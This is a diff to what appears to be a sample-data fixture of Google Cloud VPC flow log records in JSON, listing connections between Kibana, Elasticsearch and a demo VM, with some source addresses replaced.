-{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"203.0.113.134","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name
":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"67.43.156.13","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint 
Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.168.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint 
Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyv","jsonPayload":{"bytes_sent":"51075","connection":{"dest_ip":"67.43.156.13","dest_port":65320,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"608","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz0","jsonPayload":{"bytes_sent":"197840","connection":{"dest_ip":"67.43.156.13","dest_port":33562,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"258","reporter":"SRC","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proj
ect","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxys","jsonPayload":{"bytes_sent":"173805495","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":46864},"end_time":"2019-06-14T03:49:58.716492806Z","packets_sent":"44438","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.306085222Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 